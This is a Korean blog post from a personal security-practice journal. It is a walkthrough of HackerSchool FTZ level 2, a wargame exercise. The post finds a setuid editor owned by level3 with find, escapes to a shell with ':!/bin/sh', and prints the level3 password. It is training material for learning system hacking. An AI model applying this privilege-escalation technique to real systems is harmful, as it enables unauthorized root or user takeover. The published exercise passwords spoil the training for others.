HackerSchool FTZ - 2

2024. 5. 23. 10:30·시스템 해킹

id:

level2

passwd:

hacker or cracker

 

 

 

 

ls -al

cat hint

힌트를 살펴보자

 

편집이 가능하고 실행이 가능하므로 4300

기존과 같이 level3의 권한을 사용할 수 있는것을 확인했다.

 

find / -user level3 -perm -4300

/usr/bin/editor 에서 level3의 권한을 사용할 수 있는 것을 확인함

 

또는

find / -user level3 -perm -4300 2 > /dev/null

/usr/bin/editor

 

파일 설명자설명

2 > /dev/null

표준 오류(진단) 출력

표준 오류 출력만 무시하는 경우

 

 

cd /usr/bin/

./editor

 

:!/bin/sh

에디터에서 쉘을 획득하기위해 실행한다.

 

level3 권한으로 쉘권한을 획득함

 

 

 

my-pass 

명령을 실행함.

 

level3의 패스워드를 확인가능했다

 

level3 passwd

can you fly?

저작자표시 비영리 변경금지 (새창열림)

'시스템 해킹' 카테고리의 다른 글

dreamhack wargame -1  (0) 2024.05.25
HackerSchool FTZ - 3  (0) 2024.05.23
HackerSchool FTZ - 1  (0) 2024.05.23
HackerSchool FTZ trainning 전체  (0) 2024.05.23
포멧스트링 버그 - 데이터쓰기  (0) 2024.05.19
'시스템 해킹' 카테고리의 다른 글
  • dreamhack wargame -1
  • HackerSchool FTZ - 3
  • HackerSchool FTZ - 1
  • HackerSchool FTZ trainning 전체
taktaks
taktaks
보안 연습 일기장입니다. 모든 연습은 불법적인 용도로 사용하지 말아주시길 부탁드립니다. 용무는 wndudxkr2005@gmail.com 메일 부탁드립니다.
  • taktaks
    taktaks
    taktaks
  • 전체
    오늘
    어제
    • 보안 일지 (280)
      • 네트워크 구축 (12)
      • 리눅스 보안구축 (10)
      • 파이썬 기본 (11)
      • Web hacking (39)
      • 통합 인프라 보안 (41)
      • 공격기법 및 탐지 (33)
      • 악성코드 및 포렌식 (93)
      • 리버싱 (5)
      • 시스템 해킹 (20)
      • C 언어 (12)
  • 블로그 메뉴

    • 링크

    • 공지사항

    • 인기 글

    • 태그

      프롯
    • 최근 댓글

    • 최근 글

    • hELLO· Designed By정상우.v4.10.3
    taktaks
    HackerSchool FTZ - 2
    상단으로

    티스토리툴바